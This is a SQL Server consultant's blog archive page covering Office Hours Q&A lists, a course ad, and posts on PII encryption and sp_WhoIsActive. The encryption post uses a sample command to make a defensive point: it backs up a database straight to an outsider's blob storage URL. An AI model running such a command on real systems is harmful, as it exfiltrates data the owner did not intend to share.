New Online Class: Running SQL Server in AWS and Azure

Cloud Computing
6 Comments

You’re used to managing your own SQL Servers in VMs, but now they’re asking you to work with the cloud.

You’re already comfortable installing, backing up, and performance tuning “regular” SQL Servers, and you just need to catch up with what’s different about the cloud.

You don’t want hype – you just want honest opinions from someone who doesn’t work for a cloud vendor.

In this recorded class, you’ll learn:

  • How to assess your current workloads
  • How to pick the right VM type for your workload
  • How to size storage for performance, not just capacity
  • How to assess wait stats in cloud VMs
  • How to back up directly to cloud-native file systems
  • Where Azure Managed Instances & AWS RDS make sense

I’m Brent Ozar, and I’ve been managing client VMs in the cloud for over a decade. I’ll get you up to speed with unbiased facts, not hype, and save you valuable time as your career transitions to the next level.

To get started saving your company time and money, get the course for $195. Folks with a Recorded Class Season Pass: Fundamentals or a Level 2 Bundle can start watching the class right now under their account. Enjoy!


[Video] Office Hours: Six-Minute Speed Round

Videos
1 Comment

The morning after the Data TLV Summit in Tel Aviv, I stood out on the balcony and answered a few of your questions from https://pollgab.com/room/brento, rapid-fire style:

 

Here’s what we covered:

  • 00:00 Intros
  • 00:47 cyrpl: Hi Brent from PEI, Canada. A support person told me today that when creating a table, an ID column should almost be a default for every table. Do you agree? 98% of our tables do not have ID fields. Would adding ID fields to busy tables generally help query performance?
  • 01:15 Nas: What is quickest and short downtime way of migrating 7TB database on new storage old SAN (DELL) new SAN(HPE)?
  • 02:19 Simon Frazer: Have you come across scenarios where you feel SQL Server would’ve benefited from allowing more than 1 8k page for statistics?
  • 02:38 Ingibjorg: Do Postgres DBAs tend to have higher pay ceilings than MSQL DBAs?
  • 03:12 Ingibjorg: What tools / tests do you like to use when performance testing the network layer for a new SQL server?
  • 03:32 sp_blitz_says_myboss_is_a_rocket_scientist: in what cases should we create statistics ourselves?
  • 04:33 Does Basically Anything: Hi Brent! How would you recommend tuning when faced with a cursor query that has so many iterations that you can’t pull an actual execution plan when running it because it overwhelms SSMS?
  • 05:06 Ingibjorg: Management uses KPI’s to judge the developers. Management also wants KPI’s to evaluate the SQL production DBA. In addition to meeting RPO/RTO objectives, what are good / bad KPI’s for this? Tickets closed, peer review scores, etc?
  • 05:47 Mehmet: At what point should you ask dev to introduce app layer caching for a query that is rapidly re-executed?

[Video] Office Hours in Tel Aviv, Israel

Videos
2 Comments

Before speaking at the Data TLV Summit, I sat by the Mediterranean Sea and discussed the top-voted questions you posted at https://pollgab.com/room/brento.

Here’s what we covered:

  • 00:00 Start
  • 00:55 Manikandan GS: As postgres being one among the RDBMS lane, do you think postgres is having more features and flexibility compared to MS-SQL Server?
  • 02:46 PaginationWoo!: Hi Brent. I use Ola’s script to update stats nightly. Other than time spent and % CPU used, is there a case where updating stats with fullscan would be a bad thing? I’m fortunate in that I have a long maintenance window. If I have time for fullscans, wouldn’t it be worth doing?
  • 04:42 Adza: I had the thought of creating a date table with all dates ranging from 2010 to 2070 and have a smallint key for each date. Then in my tables I can store smallint values instead of actual dates. This could be a huge data saver (2 bytes vs 3 bytes). Smart or stupid?
  • 05:53 Eyes Without a Face: Is there a portable version of the First Responder Kit? Our customers are mainly banks and they are not keen to install Stored Procedure. Not even the First Responder Kit
  • 06:44 Dawson from Dawsons Creek: Do you have any clue why Microsoft suggests to use a windows collation for new development work but the default server collation for English(US) is still a SQL collation? For all other Windows locale the default server collation is a windows collation.
  • 08:07 StillLearning: Hello Brent, as a Dev DBA I’ve recently became increasingly frustrated with computed columns and their limitations (filtered index…). Should I advise the dev teams to refrain from using them and do the computation in the app instead ? Thanks
  • 09:26 Haurun: What are the pros/cons of installing Ola Hallengren maintenance script tables / sp’s in master database vs some kind of maintenance db?
  • 10:42 Milind: Hi Brent, Thanks for your time. During execution of certain queries or SPs I am observing high logical reads. Where should I look to make sure it is appropriate or required improvement? Unfortunately, I haven’t completed all the training modules and asking this question.
  • 12:06 TheCuriousOne: Hi Brent! If you have to work with local SSDs in a server for your SQL setup, is it better to have one big array with OS side logical separation through partitioning or to have physical separation by setting up smaller disk-sets with various RAID configurations?

Office Hours: Gif Reactions Edition

Some of the questions y’all post at https://pollgab.com/room/brento are open-and-shut cases. I was going to do a one-word-answers edition, but I think this is even better: gifs.

GI Joe DBA: Thoughts about IT professionals Unionizing? IT professionals are in demand. Because of our demand, should we use this leverage to unionize, raise the bar, force better health benefits, retirement benefits, etc for ALL.. US Citizens? Ever discuss this with colleagues?

Rudy: Love the statistics parser web site. Will it remain around for the foreseeable feature? If not, is the source code freely available? 

Will Marshall: What are the common mistakes to avoid when coding sprocs that will crash SSMS during execution / debugging?

DBA_Mufasa: Salut Brent! Does using filegroups really help distribute I/O throughput and minimize disk contention if the ndf files for those filegroups still reside on the same logical volume?

Justsin: Do you ever like to use “SET STATISITCS XML ON” for troubleshooting stored procedures?

40 oz Coffee Breakfast: Do you have any experience with using DDBoost as a backup solution? My friend is currently using Ola’s scripts to backup to a Data Domain as a CIFs share. Storage team asks for us to use DDBoost but there is a concern about losing granularity of restores.

Dan: Any insight into why DB restores are unbelievable painful within Azure SQL, we seem to be averaging between 20-80 minutes with < 50% success on a less than 200mb db and results are still mixed regardless of if we do point in time or full restores.

Sql Padawan: Hi Brent! I’ve really enjoyed your Mastering courses. Especially the stories and analogies you use (like the one about pets wearing disguises). What do you recommend to create a successful online course? (btw, I’m not planning to create SQL Server courses 😀 )

Menahem: Does high plan cache turn over due to improper query parameterization adversely affect commercial SQL monitoring software?

Bart: Hi Brent. What’s the best way to convert UTC datatime to local datetime/date. I’ve been using this: CONVERT(DATETIME, SWITCHOFFSET(CONVERT(DATETIMEOFFSET, mydate.MODIFIEDDATETIME), DATENAME(TZOFFSET, SYSDATETIMEOFFSET()))) AS LOCALDATETIME

Will Marshall: What are the pros/cons of letting SQL create the temp table via SELECT INTO (i.e. SELECT into #MyTempTable) vs explicitly creating the temp table then inserting into it?

YouGottaDoWhatYouGottaDo: Hi Brent, do you know of a list of former “Best Practices” for SQL Server that have now become useless or even dangerous/harmful (due to engine/OS evolution)?

Menahem: Do any of your clients run their primary AG / HA SQL2019 node on prem and their secondary 2019 AG / HA node in Azure? Is this a bad idea?

And I’ll leave you with a bonus gif:


Most DBAs Say They’re Encrypting Personally Identifiable Data. Most.

Despite the continuous stream of data breaches, ransomware, and GDPR violations, some companies still aren’t encrypting personally identifiable information (PII) inside their databases or backups.

I see this all the time when working with clients, but I can’t exactly talk about that or give numbers, so I decided to take a highly unscientific poll on Twitter. I figure if DBAs are sitting around on social media, they’re probably done with all the important parts of their job. Here’s how the 147 votes came in:

Hoping for more upbeat news, I also asked on LinkedIn, a more professional social media network, where maybe people do their jobs better? I’m just guessing, who knows:

The story was better, but it’s still sketchy. Depending on where you ask, one in five to one in three shops isn’t encrypting their personally identifiable information at all.

I actually have a hunch the number is much worse because in a social media poll, we’re just taking folks at their word. In reality, when I’ve lifted the covers to dig a little deeper with the business, we’ve found things like production data being restored to development servers, and stored unencrypted.

When I’ve discussed this with clients, some folks even say, “Yes, we’re encrypting data – we use encryption at rest at the storage level. Everything that hits disk is encrypted automatically.” Okay, great – now what happens when someone takes a backup? They can copy that backup anywhere they please, like writing directly to someone else’s Azure Blob Storage account or to Amazon S3, and you won’t get any errors or warnings. Storage-level encryption doesn’t stop data exfiltration.
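To make the exfiltration point concrete, here’s a rough sketch – the database name and the storage account URL are made up, and the point is that SQL Server will happily write a backup to any URL it has a credential for:

```sql
-- Hypothetical example: nothing in storage-level encryption stops this.
-- A backup can target any blob container a credential exists for,
-- including a storage account your company doesn't own.
BACKUP DATABASE [Sales]
    TO URL = 'https://somestrangeraccount.blob.core.windows.net/backups/sales.bak'
    WITH COMPRESSION;
-- If the data inside the database isn't encrypted (TDE, Always Encrypted,
-- or column-level encryption), whoever holds that blob can read everything.
```

Encryption at rest protects the drives in the data center, not the backup file once it leaves.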

It’s okay if you don’t have all of the answers, but as a database administrator, you should start by asking a few questions:

  • Where are we storing personally identifiable information?
  • Is that data encrypted, and how?
  • If it’s not encrypted, what’s the plan to get it encrypted? Is the business waiting on me to do something?
  • Has anyone given my manager and the company’s security & compliance departments the answers to the above in writing?

Asking those questions is the first step to getting your company to a safer place.


[Video] Office Hours: Ask Me Anything About SQL Server and Azure

Videos
5 Comments

Got questions about the Microsoft data platform? Post ’em at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. Today’s episode finds me in my home office in Vegas:

  • 00:00 Intros
  • 02:10 GeorgeDAX: Hello Brent, I’m a dealing with a huge sales table which contains around 500 columns with 50m rows. Business asks to add even more columns in the table. Should I break the table or keep adding columns to the same one? Performance wise, what’s the best approach?
  • 04:47 Brynjar: Do you have a suggested max column limit when designing new tables that require fast queries?
  • 05:58 Manuel Labour: What is the largest stored proc you ever had to optimize? How long did you spend on it?
  • 07:24 Yavin: When analyzing SQL memory use, what are healthy / unhealthy utilization ratios for MEMORYCLERK_SQLBUFFERPOOL, CACHESTORE_SQLCP, MEMORYCLERK_SQLGENERAL?
  • 08:21 Eduardo: Is it safe to run sp_blitzindex on a busy OLTP server (3000+ batches per second) during peak business hours or should this be done after hours?
  • 10:22 3rdNormalForm: HEAPS & Vendor Packages. I have a 43 million row table called transactionxlog with no keys and no CX. sp_blitzcache shows 7 queries against this table with costs of 883. I took the recommend composite index and made it into a clustered index. [UNIQUIFIER] what is it?
  • 12:05 DB_Architect_Chick: Hi Brent. I’m designing a new database for 50k inserts/selects (minimal updates) per hour. I am doing my best to make mature design decisions, but with no actual data to test against, do you have any suggestions for establishing an effective initial index strategy?
  • 15:22 Eduardo: What is your opinion of Intel QAT backup compression in SQL 2022?
  • 17:34 Vilhelms: Is there a good way to know when a query caused an auto stats update and how long the auto stats update took?
  • 19:39 Pete S: What is your opinion\thoughts on the “SQL Graph Database” feature that was introduced in SQL Server 2017? Have you worked with any clients that use it in production OR is this another “copy-cat” feature to keep up with the database Jones’?
  • 20:57 RaduDBA: Mr. Brent, with all the cloud solutions and cloud databases that take over the data landscape, like datawarehouses, lakehouses etc. is there still room for SQL Server and traditional on-prem databases? I work as a DBA and do a lot of performance tuning. Is my career doomed?
  • 23:43 cyrpl: Brent, can you suggest a stored procedure source control tool. We have gitlab for code source control but we specifically want to track all changes to SQL Server stored procedures.
  • 25:56 YouGottaDoWhatYouGottaDo: Hi Brent! Have you ever encountered a very toxic work environment (dictator-boss, widespread discontent etc.) that created problems for you during your consulting work (even 1-day consultancy)? How did you handle this?

Community Tools Month: Using sp_WhoIsActive to Catch ASYNC_NETWORK_IO

Monitoring
10 Comments

When your SQL Server’s top wait stat is ASYNC_NETWORK_IO, that indicates SQL Server is waiting on the app to ask for the next part of the result set.

This is a real pain in the rear to troubleshoot because these waits often last a really short duration each time – think milliseconds, not seconds. It’s death by a thousand cuts.
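Before digging in, it’s worth confirming that ASYNC_NETWORK_IO really is near the top of your waits. A rough sketch using the wait stats DMV – the excluded wait types here are just a few common benign ones, not an exhaustive list:

```sql
-- Rough sketch: top waits accumulated since the last restart.
-- ASYNC_NETWORK_IO near the top suggests apps are slow to
-- consume the result sets SQL Server is sending them.
SELECT TOP 10
       wait_type,
       wait_time_ms / 1000.0 AS wait_time_seconds,
       waiting_tasks_count
FROM sys.dm_os_wait_stats
WHERE wait_type NOT IN ('SLEEP_TASK', 'LAZYWRITER_SLEEP',
                        'SQLTRACE_INCREMENTAL_FLUSH_SLEEP',
                        'BROKER_TO_FLUSH')
ORDER BY wait_time_ms DESC;
```

Tools like sp_BlitzFirst do a much more thorough job of filtering out harmless waits, but this gets you a first look.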

The easiest way to get a quick idea of what’s happening is to run sp_WhoIsActive (GitHub – releases) repeatedly with no pauses in between:

Here, I’m running a workload with a lot of short queries running simultaneously. If I just run sp_whoisactive now and then, I don’t see any activity – only a query or two now and then, and they’re rarely waiting on network. However, if I run it several times in a row, right away:
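One quick way to get those back-to-back runs in SSMS is the GO batch separator’s repeat count – a small sketch, not a precise methodology:

```sql
-- Run sp_WhoIsActive five times in a row with no pause between
-- executions, catching whichever short-lived queries happen to
-- be in flight during each snapshot.
EXEC sp_WhoIsActive;
GO 5
```

Each execution returns its own result set, so you can eyeball which wait types and apps keep showing up across the snapshots.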

Then I can get a fast, seat-of-the-pants idea of which queries are waiting on networking. I can also scroll across to the right in the result set and see which app it’s coming from, which servers, which logins, etc.

This isn’t an exact science by any means, but when I’m working with a client, it helps me quickly get a rough idea of what’s going on. It helps me start a conversation about the kinds of queries we’re running, how much data we’re bringing back (both in terms of rows and columns), and find out whether the app servers might be underpowered or swapping to disk.

Clients have said things like:

  • “Oh, we had no idea that app was bringing back all of the columns, and that’s problematic since we added a few XML/JSON/MAX columns in the table since that query was written.”
  • “Oh, we had no idea that application was taking so long to digest the results of those queries. We can give that app server more memory.”
  • “Oh, we had no idea that it was bad if we ran the database server in one data center, and the app servers elsewhere.”

ASYNC_NETWORK_IO isn’t necessarily a bottleneck for SQL Server – fixing the above problems may not make a big performance difference for other users – so solving it is often relatively low-value work during an engagement. sp_WhoIsActive helps me dedicate an appropriately small amount of time and effort to the problem, and then move on to the bigger problems.


[Video] Office Hours: Hotel Balcony Edition, Part 2

Videos
0 Comments

Post your questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered:

  • 00:00 Introductions
  • 00:59 Haydar: What tools do you like to use when troubleshooting azure sql db query performance issues?
  • 01:57 The Midhight Idol: Does the glitz and glamour of Vegas ever wear off or get old?
  • 02:48 Haydar: Would a PostgreSQL version of constant care see the same demand and success?
  • 03:23 Walcott: Which Intelligent Query Processing features do you like or dislike in SQL Server 2019 and 2022?
  • 04:18 Delete_Rule:Cascade: Good day Brent! I’m new to data warehousing and I was wondering what your thoughts are on using SSIS for ETL operations? Are there similar products out there that are better or is SSIS the go-to product?
  • 05:08 Nikolajs: What is the largest number of tenants you have seen inside a single multi-tenant SQL server instance? Did this pose any unique challenges?
  • 07:00 Morty: What are your thoughts on new SQL 2022 ledger functionality and it’s use cases?
  • 09:27 MyFriendtheDBA: I’m getting excited about PASS Summit this November (my first). Being a Seattle-neophyte, any restaurant/food truck/personal kitchen recommendations for the trip?
  • 11:42 Nomad: My friend copied a database with Windows authentication using the “detach and attach” method. The .mdf and .ldf file permissions changed and reattaching the database failed. Why did the file permissions change and what steps would you take to resolve this issue?
  • 12:36 Madiha: What’s your opinion of the query plan viewer in Azure Data Studio?
  • 14:13 CronullaStingray: Hi Brent. I ran blitzindex and got “Indexaphobia: High Value Missing Index” which I created without modifications. It’s been over a month and the dm_db_index_physical_stats user_seeks and user_scans are both showing 0s. But blitzindex still says I need to create it. Why is that?
  • 15:33 Anatoli: How do you know if query store is a good / bad fit for your SQL server 2019 enterprise instance?
  • 16:30 Anatoli: What are the risks of long running native SQL backups?

[Video] Office Hours: Hotel Balcony Edition, Part 1

Videos
1 Comment

Post your questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered today:

  • 00:00 Introductions
  • 00:25 Kebros: Hi Brent.My manager wants me to summarize sql health into a number 1-100 for all 50 production Servers.This is idiotic but just for Banter, what health metric (Eg I/O) will you advise me to use and average out (even if it doesn’t paint a whole picture) so I can feed my family.
  • 02:08 SwissDBA: Hi Brent, I inherited a database of 2 TB with 355 data files. How would you check (and prove to the business) if the database has too many data files? Even the biggest file is just 55 GB big and I believe the DB could be faster with much less data files.
  • 04:32 Britney: What are the common strategies you see used for recovering from “Oops” queries?
  • 05:40 LifeExtinguisher: Can rcsi improve backup speed? Considering backup reads the whole db and saves in bak file, and reads are routed to tempdb for older values, not needing shared lock on resource that already is booked by some other exclusive lock
  • 06:33 Sussudio: What tools / techniques do you recommend for generating large sudo realistic synthetic data loads for performance testing in the lower SQL environments?
  • 08:27 Dilara: When are SQL Server questions better suited for stackoverflow.com vs dba.stackexchange.com? Which forum has less snark?
  • 09:25 Lieutenant Dan: What are the top 4 SQL conferences ranked in order?
  • 11:33 Fyodor: What is your opinion / experience with using client side profilers like C# MiniProfiler to monitor SQL query performance?
  • 13:14 Does Basically Anything: Hi Brent! Regarding sp_databaserestore. I was wondering if you knew of anyone who wrote something open source that utilizes it for automating testing restores from multiple servers, multiple databases. Any clickholes I could venture down before I start building something myself?
  • 14:28 happydba: do you have a video of the baby sea turtles yet?!? 😀
  • 15:14 Haydar: What are your preferred scripts / tools for monitoring Always On latency?

Community Tools Month: Choose Your Character

This month on the blog is Community Tools Month, and I’m going to be talking about some of the most useful and influential tools out there.

You can’t learn them all – *I* can’t learn them all – because there just aren’t enough hours in the day to do your work, keep your skills sharp, take care of yourself, and take care of the ones you love.

So this month, think about a couple of things:

  • Can I use this tool to get my existing tasks done faster?
  • Do I want to keep doing these tasks in my next job?
  • What tasks do I wanna do in my next job?
  • Can I learn this tool to help me get my next job?

With that in mind, here’s something I use all the time with clients when I’m asking how many staff they have to support a particular application:

There are certainly more data-related jobs – BI developer, architect, data scientist, data engineer, etc – but let’s start here.

I know there are gonna be readers who say, “I do all of those tasks.” Sure you do – but you don’t do them well, and if you think you do, you’re deceiving yourself about what “well” means for any of those columns. You’ll be in for a world of surprise when you go to interview for a senior position in any of those columns, because senior = specialist.

With that in mind, for each of those columns, today I’m going to list a tool that I think is important for your next job.

If you want your next job to be Production DBA,
you should be learning dbatools.

In your current position, you may not manage enough servers to justify it. You might be content doing your work one server at a time, with the SSMS GUI and T-SQL. However, the Production DBA role at small companies will continue to evolve over the next decade, and your skills need to be ready for your next job. You want bigger responsibilities, and that means accomplishing more tasks, more quickly.

Get these two books and read them in order:

You’ll learn how the open source dbatools module helps you manage more servers, in less time, while making fewer errors.

Like any new tool, it’s going to be slower going for you at first – probably even for months. But when it’s time to get your next job, the one managing more servers in more environments, you’re going to be able to use the exact same techniques that you’ve already been practicing at your smaller job.

If you want your next job to be a Development DBA,
you should be learning sp_HumanEvents.

I’m not telling you to learn Extended Events – you can, sure, but you don’t need to. Erik Darling’s sp_HumanEvents automates the data collection AND, here’s the important part, the analysis, for the most common long-term problems that performance tuners need to solve. I don’t use Extended Events myself directly, ever, but I use sp_HumanEvents all the time.

To understand how powerful and useful it is, start with Erik’s 10-minute video on using it to troubleshoot blocking, compiles, and recompiles.

Then, go get it and read the documentation.
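As a taste, a typical call looks something like this – check the current documentation for exact parameter names and valid values, since the procedure evolves:

```sql
-- Sample the server for 30 seconds, collecting and analyzing
-- blocking events, then returning the digested results.
EXEC dbo.sp_HumanEvents
    @event_type = 'blocking',
    @seconds_sample = 30;
```

The point is that one stored procedure call replaces building the Extended Events session, watching it, and parsing the XML yourself.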

If you want your next job to be developer,
you should be learning MiniProfiler.

When your team builds software-as-a-service (SaaS) applications, sooner or later, you’re going to run into a problem with server performance analysis. SQL Server has historically struggled with this, and it’s getting even worse in SQL Server 2022.

Because of these problems, you’re going to be a much more effective developer if you can implement the free open source MiniProfiler to track which parts of your application are having performance problems, and which queries are causing those problems.

I’m not saying you have to be the one who analyzes the data, reads the queries, and tunes them. However, as a developer, you are the one who’s going to have to implement the data-collecting solution. This need is even more important in the cloud where performance costs pile up every month, and the urgency to fix ’em becomes even higher.

All 3 of these have something in common.

They’re on GitHub.

GitHub itself isn’t a community tool, but in 2022, GitHub is the tool where community open source happens. I’m not saying you have to learn GitHub or use it for your own code – it can be a real pain in the keister. But if you learn the basics of how to clone a project locally and keep it up to date, you’ll likely be better off no matter what your future job entails.


Office Hours, Short Text Answers Edition

Not all of the questions y’all post at https://pollgab.com/room/brento require long, thought-out answers. Some are just one-line specials, like these:

F’legend: Hi Brent, in reply to a question talking about database restores for 1TB+ you also touched on scrubbing or synthetic data as a way to populate dev environments. Are there any resources/tools you would suggest for these approaches?

Read this and the comments on it.

On Another Beach Somewhere: I am using multiple instances of SQL on the same VM. Brent says that’s a bad idea… lets pretend I have a good reason. How does Min/Max Memory come into play? Can I set both instances to the same “Max” and let them compete for memory or do I need to allocate a portion to each?

Congratulations. You just discovered one of many reasons why I told you it was a bad idea. Just wait til you discover CPU contention.

Steph: Hello Brent, is there a reason why SQL Server doesn’t seem to have shortcuts to compute stats on columns with unique constraint ? Why scan all rows when the density is always 1/count(*) and histograms seem useless ? This confuses me. Thanks.

Because some queries will do range scans, as in, show me all IDs between 1000 and 2000. SQL Server needs to know how many IDs exist in that range – some IDs may have been deleted. The only way to find out is to read the data.

Darin Webber: Hello Brent!! I need to change a datatype of 2 columns on a very large table.What would be the best approach for his operation? Creating 2 new columns and copying the data and then dropping the old ones, or there is another better approach? Will dropping the columns cause downtime?

Read this.

Tayyip: Is there an ideal index usage stats age band for when it’s safe to make decisions re: dropping rarely used NC indexes?

For me, if an index hasn’t been used in 32 days, it needs to go.
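One rough way to check is sys.dm_db_index_usage_stats – keeping in mind that its counters reset at restart (and in some cases at index rebuild), so first verify the server has been up longer than your decision window:

```sql
-- Rough sketch: nonclustered indexes with zero reads recorded
-- since the last restart. Check sqlserver_start_time in
-- sys.dm_os_sys_info first to confirm enough history exists.
SELECT o.name AS table_name,
       i.name AS index_name,
       s.user_updates
FROM sys.indexes i
JOIN sys.objects o
  ON o.object_id = i.object_id
LEFT JOIN sys.dm_db_index_usage_stats s
  ON s.object_id = i.object_id
 AND s.index_id = i.index_id
 AND s.database_id = DB_ID()
WHERE o.is_ms_shipped = 0
  AND i.type_desc = 'NONCLUSTERED'
  AND COALESCE(s.user_seeks, 0)
    + COALESCE(s.user_scans, 0)
    + COALESCE(s.user_lookups, 0) = 0
ORDER BY o.name, i.name;
```

Even then, script out the index definition before dropping it, in case a month-end or year-end process turns out to need it.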

Don’t Blame Anthony: What is your opinion of using Pure FlashBlade to speed up SQL backups and restores?

I haven’t used it myself.

Daniel: Can you please please break down steps and the process of consuming data from an API (JSON format) using SSIS and then uploading that consumed data into a SQL Server database? Thanks!

I don’t use SSIS.

Bad DBA Taylor: We built a devops repo to deploy SQL permissions for service accounts, but due to the high volume (15k/batches/s) the release pipeline gets deadlocked on a very simple CREATE USER statement causes a massive SCH_M lock chain. Our security cache is 12gb. Could this be the problem?

If you think it is, try to flush that cache first as part of your deployment scripts. (I have a feeling it isn’t, though.)

RoJo: I want to add AG offsite. Can I use 2016 on-site and 2017 or 2019 offsite?

I would not do that, no. Failover would be one-way – you couldn’t fail back.

TeeJay: We recently had to do an unplanned over-the-top SQL upgrade from 2014 to 2017 in our prod environment (yes, bad, I know). I now have a bunch of fires to put out. Are there any obvious first places to look for new performance problems (like the cardinality estimator was for 2014)?

Indeed there are! Check out my Mastering Server Tuning class.


Tayyip: What are the pros/cons of working as the sole SQL DBA vs working on a team of SQL DBA’s?

You can learn more, more quickly, by working with others. You also have to put up with them.

Alex: Hi Brent, You look like someone that is in pretty good shape. How do you balance your Work, Health & Mind in what can be a sedentary job. Especially because of Covid alot of people are not having to go into the office any more?

Read this.

Seshat: What are your thoughts on using SQL startup option -E for index rebuild / read ahead performance across multiple data files?

Never heard of it.

Sekhmet: What is your experience / opinion of using NVDIMM / PMEM as a high speed storage for SQL Server?

It’s dying.

Don’t Blame Anthony: How do you deal with undetected write errors in SQL server?

Detect them by running DBCC CHECKDB as frequently as practical – even overnight if your business windows allow it.

Anatoli: What interesting tools do you know of (besides SSMS / Sentry Plan Explorer) that will parse SQL query plans?

Quest Spotlight Tuning Pack is another one.

DBAInProgress: Hello Brent. What different screencast softwares have you used to overlay yourself onto your screen with audio?

Read this.

Piotr: What are your favorite DMV’s in Azure SQL DB?

I don’t have a separate set there – I try to use common ground between both Azure and SQL Server.

Fyodor: Do you have any guidelines for maximum number of columns to allow for the include columns in a NC index?

Yes, and we discuss them in my Mastering Index Tuning class.

Mahesh: When Sql is migrated to cloud will there be a change to RTO and RPO .

Yes.

DanishDBA: Hi Brent. My friend is going to implement logging requirements from customers. They want to see who changed a column value, date and old/new value. Is System-versioned Temporal Tables the recommended solution when performance is the main concern? What are your thoughts on this?

If performance is the main concern, only log the specific columns you care about. For example, you probably wouldn’t want to monitor high-velocity columns like QuantityInStock. When you only care about specific columns and specific sources, triggers are likely to be faster, and generate less transaction log activity.
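A minimal sketch of that trigger approach – the table, column, and trigger names here are all made up for illustration:

```sql
-- Hypothetical: audit only the Price column on dbo.Products,
-- rather than versioning every column with temporal tables.
CREATE TABLE dbo.ProductPriceAudit
(
    AuditId   bigint IDENTITY PRIMARY KEY,
    ProductId int           NOT NULL,
    OldPrice  decimal(18,2) NULL,
    NewPrice  decimal(18,2) NULL,
    ChangedBy sysname       NOT NULL DEFAULT SUSER_SNAME(),
    ChangedAt datetime2     NOT NULL DEFAULT SYSUTCDATETIME()
);
GO
CREATE TRIGGER dbo.trg_Products_PriceAudit
ON dbo.Products
AFTER UPDATE
AS
BEGIN
    SET NOCOUNT ON;
    -- Only log rows where the column we care about actually changed.
    IF UPDATE(Price)
        INSERT dbo.ProductPriceAudit (ProductId, OldPrice, NewPrice)
        SELECT d.ProductId, d.Price, i.Price
        FROM deleted d
        JOIN inserted i ON i.ProductId = d.ProductId
        WHERE ISNULL(d.Price, -1) <> ISNULL(i.Price, -1);
END;
```

Because the trigger only fires on updates and only writes the changed column, it generates far less log activity than versioning entire wide rows.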

Skrillex: How do you verify that it’s safe to upgrade DB compat mode to latest version? 2014 to 2019 in this case.

Read this.

Urquan: What percent of your clients license SQL by the server / core vs Microsoft Assurance?


I don’t track that. I don’t sell licensing. I don’t even ask clients how they’re licensing it.

Guðmundur: For query perf testing, can you hint DB compat level at the query level vs changing for entire DB?

Read this.

Piotr: What is your opinion of external tables in Azure SQL DB? Do they perform any better than linked servers in on-prem SQL Server?

Never used ’em.

Elijah: Are there workflow orchestrators that you recommend as an alternative for SSIS? SSIS seems to have pain-points around metadata getting out of date, difficulty to review as code, and being difficult to debug for large workflows. However, nothing else seems to work with SQL Agent.

I don’t work with SSIS, so I’d post that on #SQLHelp.

Anatoli: What are the ideal display columns / column order when running sp_whoisactive to triage a server performance fire?

The defaults. Learn to use the defaults so that when you parachute into a server you’ve never seen before, you can work quickly.

Chenjesu: Do you see any interesting SQL alerting mechanisms at your clients other than email?

No.

Bryan Flores: Hello Brend, do you recommend sql server replication in 2019 or 2022, but do you recommend instead of replication

Come on, Ryan, that’s like asking if I recommend hammers. What’s the problem you’re trying to solve? Don’t ask if you should use a tool – describe the problem you’re facing, and then we can pick the right tool, Mr. Flowers.

Yehat: How do SQL DB snapshots compare with SAN snapshots as a potential rollback mechanism for a failed application deployment / update?

Most of the clients I work with have some kind of high availability and disaster recovery mechanism like log shipping, AGs, or SAN replication. You can’t roll back a database snapshot without affecting everything downstream. SAN snapshots have similar problems, but if you’re also using SAN replication for DR, the syncing back & forth is way easier.

The Swedish Chef: How do you project costs for hypothetical Azure SQL Managed instance against hypothetical SQL in Azure VM? Need to figure out who wins a bakeoff and migrate from on-prem.

Start by exactly quantifying your per-server costs to build, manage, and troubleshoot Always On Availability Groups for a single cluster. If you can’t do that, a true cost comparison is hopeless. (Hint: it’s hopeless.)

Anatoli: What is your opinion of the TSQL MERGE statement? Do you have any performance tips when using it?

Read this.
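If you do reach for MERGE, one widely shared tip is adding a HOLDLOCK (serializable) hint so a concurrent session can't sneak a row in between the match check and the insert. A sketch with hypothetical table and parameter names:

```sql
-- Upsert with HOLDLOCK to reduce race conditions under concurrency:
MERGE dbo.Accounts WITH (HOLDLOCK) AS t
USING (SELECT @AccountId AS AccountId, @Balance AS Balance) AS s
    ON t.AccountId = s.AccountId
WHEN MATCHED THEN
    UPDATE SET Balance = s.Balance
WHEN NOT MATCHED THEN
    INSERT (AccountId, Balance)
    VALUES (s.AccountId, s.Balance);
```

Even with the hint, test MERGE carefully – it has a long list of documented gotchas.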

Sajawal: Please don’t say NO. How can we read an execution plan on Azure Synapse Analytics? Please help us in that world as well.

I’ve never used Synapse Analytics.

Yitzhak: Do SSMS live query stats ever get you over the performance finish line?

Yes, but read this.

Vilhelms: When do you like to use sp_blitzwho vs when do you like to use sp_whoisactive?

I answer that one in this module of my How I Use the First Responder Kit class.

Guðmundur: Which SQL locking model is easier for developers to understand and code? Optimistic or pessimistic locking?

Optimistic.
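In SQL Server terms, optimistic locking for readers usually means turning on Read Committed Snapshot Isolation at the database level. A sketch with a hypothetical database name – the ROLLBACK IMMEDIATE clause kills in-flight transactions so the change can take effect:

```sql
ALTER DATABASE MyApp
    SET READ_COMMITTED_SNAPSHOT ON
    WITH ROLLBACK IMMEDIATE;
```

After that, readers see the last committed version of rows instead of blocking behind writers.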

SQL_RAGE: How does referencing a column by an alias versus the column name influence SQL’s decision on which execution plan to use? Seeing SQL use a bad plan for a query using the column name in an ORDER BY, but a good plan when using the column alias.

Odds are, it’s unrelated to the alias, and related to optimization timeouts. I explain those in my Fundamentals of Query Tuning class.
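To see for yourself, compare the two forms side by side – they normally compile to identical plans, so if they diverge, check the plan properties for an optimization timeout (table and column names here are illustrative):

```sql
-- ORDER BY the column name:
SELECT DisplayName AS Name FROM dbo.Users ORDER BY DisplayName;

-- ORDER BY the alias -- usually produces the same execution plan:
SELECT DisplayName AS Name FROM dbo.Users ORDER BY Name;
```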

Ramil: Hi Brent! App controls a lot of things like amount of database files-only one, indexes can be created only via app, partitioning is not allowed. How can I scale up horizontally in this case? because DB is growing 250gb per month. OLTP DB, currently 1.8 TB, in AlwaysOn AG.

I think you fundamentally misunderstand scaling terms. Scaling up vertically refers to adding hardware. Scaling out horizontally refers to adding more servers. In either case, this is pretty far beyond a free Office Hours question – feel free to click Consulting at the top of the screen before you make a multi-million-dollar licensing and hardware architecture plan.

Fyodor: Would you consider blogging a list of your top 10 most watched Ozar You Tube videos?

No, because people who aren’t smart enough to go to my YouTube channel, click Videos, and click Sort By aren’t smart enough to hold down database jobs anyway.


Who’s Hiring in the Database Community? September 2022 Edition

Who's Hiring
17 Comments

